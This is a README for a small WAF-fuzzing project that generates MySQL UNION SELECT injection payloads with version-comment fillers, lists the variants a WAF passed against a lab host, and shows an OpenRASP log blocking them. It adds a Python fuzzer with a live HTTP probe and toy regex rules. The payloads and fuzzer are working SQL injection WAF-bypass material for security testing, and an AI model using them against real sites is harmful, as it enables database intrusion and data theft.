# waf-fuzz-example

Repository: https://github.com/CaledoniaProject/waf-fuzz-example (Python; described as "Example code to Fuzz WAF rules"; last pushed 2018-02-09)

[From FreeBUF: Fuzz自动化Bypass软WAF姿势 (automated fuzzing techniques for bypassing software WAFs)](http://www.freebuf.com/sectool/161808.html)

# Test method

Edit `main.py`, set your own payload template and target server address, and the results below can be reproduced. The code was rewritten following the original author's approach so that it is easier to adapt later. Each line is one generated URL that the WAF let through; the only thing varying is the filler between the MySQL version comments (`/*!`, `+`, `%0a`, `%0b`, `%0c`, `%0d`):

```
%> python main.py
[PASS] http://172.16.177.120/mysql.php?id=-1/*!union/*!/*!/*!/*!select*/1,0x41424344
[PASS] http://172.16.177.120/mysql.php?id=-1/*!union/*!/*!/*!+select*/1,0x41424344
[PASS] http://172.16.177.120/mysql.php?id=-1/*!union/*!/*!/*!%0aselect*/1,0x41424344
[PASS] http://172.16.177.120/mysql.php?id=-1/*!union/*!/*!/*!%0bselect*/1,0x41424344
[PASS] http://172.16.177.120/mysql.php?id=-1/*!union/*!/*!/*!%0cselect*/1,0x41424344
[PASS] http://172.16.177.120/mysql.php?id=-1/*!union/*!/*!/*!%0dselect*/1,0x41424344
```

# Closing notes

Of course, this tool can only fuzz a WAF. None of the generated test cases bypass algorithm #2 of [OpenRASP](https://rasp.baidu.com): as the log below shows, the RASP hooks the JDBC driver (`com.mysql.jdbc.StatementImpl.executeQuery`) and inspects the assembled SQL statement rather than the raw HTTP request, so the comment tricks that confuse a request-level regex are still visible at that layer. The `plugin_message` "禁止MySQL版本号注释" reads "MySQL version-number comments are forbidden":

```
{
  "referer": "",
  "attack_type": "sql",
  "intercept_state": "block",
  "plugin_confidence": 100,
  "plugin_name": "java_builtin_plugin",
  "server_version": "7.0.78",
  "server_hostname": "devnull",
  "url": "http://127.0.0.1:8080/mysql/?id\u003d1/*!union/*!/*!/**/.select*/1,0x41424344",
  "target": "127.0.0.1",
  "path": "/mysql/",
  "event_type": "attack",
  "attack_params": {
    "mysql_connection_id": "104",
    "server": "mysql",
    "query": "SELECT * FROM users WHERE id \u003d 1/*!union/*!/*!/**/.select*/1,0x41424344"
  },
  "server_ip": "127.0.0.1",
  "stack_trace": "com.mysql.jdbc.StatementImpl.executeQuery(StatementImpl.java)\norg.apache.jsp.index_jsp.runQuery(index_jsp.java:28)\norg.apache.jsp.index_jsp._jspService(index_jsp.java:127)\norg.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)\njavax.servlet.http.HttpServlet.service(HttpServlet.java:731)\norg.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:439)\norg.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:395)\norg.apache.jasper.servlet.JspServlet.service(JspServlet.java:339)\njavax.servlet.http.HttpServlet.service(HttpServlet.java:731)\norg.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)\norg.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)\norg.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)\norg.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)\norg.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)\norg.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:218)\norg.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)\norg.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:506)\norg.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)\norg.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103)\norg.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:962)\n",
  "attack_source": "127.0.0.1",
  "request_id": "02cf3e7b34e64243bd0c1548ee135601",
  "event_time": "2018-02-09T22:50:47",
  "plugin_message": "禁止MySQL版本号注释",
  "user_agent": "python-requests/2.11.1",
  "server_type": "Tomcat"
}
```
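The "Test method" section only shows the output of `main.py`, not the script itself. The following is an added example, not the repository's code, that reconstructs the procedure the output implies: a payload template with a slot, a candidate set of fillers (the six the README tries, plus the `/**/` and `.` that appear in the OpenRASP log), cartesian-product expansion, and a PASS/BLOCK verdict per URL. The target host `127.0.0.1`, the template string, and the PASS criterion (no HTTP 403 and the hex marker `0x41424344`, which is MySQL for `ABCD`, echoed back) are assumptions, since none of them is stated on the page. The two regex "WAF rules" are constructed for the offline run and do not model any real product; `http_probe()` is the live variant to swap in against your own lab target.

```python
"""Template-driven WAF rule fuzzer (added example, not the repository's main.py)."""
import itertools
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Tuple

# Fillers tried between "union" and "select". The first six are the ones the
# README output shows; "/**/" and "." appear in the OpenRASP log entry.
FILLERS = ["/*!", "+", "%0a", "%0b", "%0c", "%0d", "/**/", "."]

# Payload shape taken from the README output; {0} is the fuzzed slot.
# Assumption: the real main.py template format is not on the page.
TEMPLATE = "-1/*!union/*!/*!/*!{0}select*/1,0x41424344"

# Hypothetical target; substitute your own lab host.
BASE = "http://127.0.0.1/mysql.php?id="

Probe = Callable[[str], Tuple[int, str]]


def expand(template: str, slots: List[List[str]]) -> List[str]:
    """Fill every {i} slot with every candidate (cartesian product over slots)."""
    return [template.format(*combo) for combo in itertools.product(*slots)]


def classify(status: int, body: str) -> str:
    """Assumed PASS criterion: the WAF did not reject the request (HTTP 403) and
    the injected marker is echoed back. 0x41424344 is MySQL hex for "ABCD", so
    seeing it shows the UNION SELECT ran, not merely that the WAF let it pass."""
    if status == 403:
        return "BLOCK"
    return "PASS" if "ABCD" in body else "BLOCK"


def http_probe(url: str, timeout: float = 5.0) -> Tuple[int, str]:
    """Live probe: fetch the URL and return (status, body). Not used offline."""
    req = urllib.request.Request(url, headers={"User-Agent": "waf-fuzz-example"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def fuzz(base: str, template: str, slots: List[List[str]], probe: Probe) -> Dict[str, str]:
    """Return {url: "PASS" | "BLOCK"} for every expansion of the template."""
    results: Dict[str, str] = {}
    for payload in expand(template, slots):
        url = base + payload
        status, body = probe(url)
        results[url] = classify(status, body)
    return results


# --- Toy WAF rules, constructed for the offline demo; not any real product ---
UNION_SELECT = re.compile(r"union\s+select", re.I)
COMMENT_NOISE = re.compile(r"/\*!|\*/|/\*\*/")


def naive_rule(decoded: str) -> bool:
    """Matches "union<whitespace>select" on the URL-decoded value as-is."""
    return bool(UNION_SELECT.search(decoded))


def stripping_rule(decoded: str) -> bool:
    """Same regex after removing MySQL version-comment markers, i.e. a rule
    that normalises the comment noise away before matching."""
    return bool(UNION_SELECT.search(COMMENT_NOISE.sub("", decoded)))


def make_fake_probe(rule: Callable[[str], bool]) -> Probe:
    """Simulated WAF + backend: 403 when the rule fires, otherwise a 200 page
    echoing the marker (the toy backend assumes the injected SELECT executes)."""
    def probe(url: str) -> Tuple[int, str]:
        raw = urllib.parse.urlsplit(url).query.partition("=")[2]
        decoded = urllib.parse.unquote_plus(raw)  # "+" -> space, %0a -> "\n"
        if rule(decoded):
            return 403, "blocked by toy WAF"
        return 200, "<td>1</td><td>ABCD</td>"
    return probe


def report(results: Dict[str, str]) -> List[str]:
    """Lines in the README's "[PASS] url" format."""
    return [f"[{verdict}] {url}" for url, verdict in results.items()]


if __name__ == "__main__":
    for rule in (naive_rule, stripping_rule):
        print(f"--- {rule.__name__} ---")
        print("\n".join(report(fuzz(BASE, TEMPLATE, [FILLERS], make_fake_probe(rule)))))
```

Run offline, the naive rule passes all eight variants because `/*!/*!/*!` sits between the two keywords; the stripping rule catches the five whitespace fillers but still passes `/*!`, `/**/` and `.`, which is exactly the residual gap this kind of fuzzing is meant to surface. Keep the README's caveat in mind when reading a PASS: it says the request-level filter missed the payload, not that a RASP inspecting the assembled SQL at the driver would.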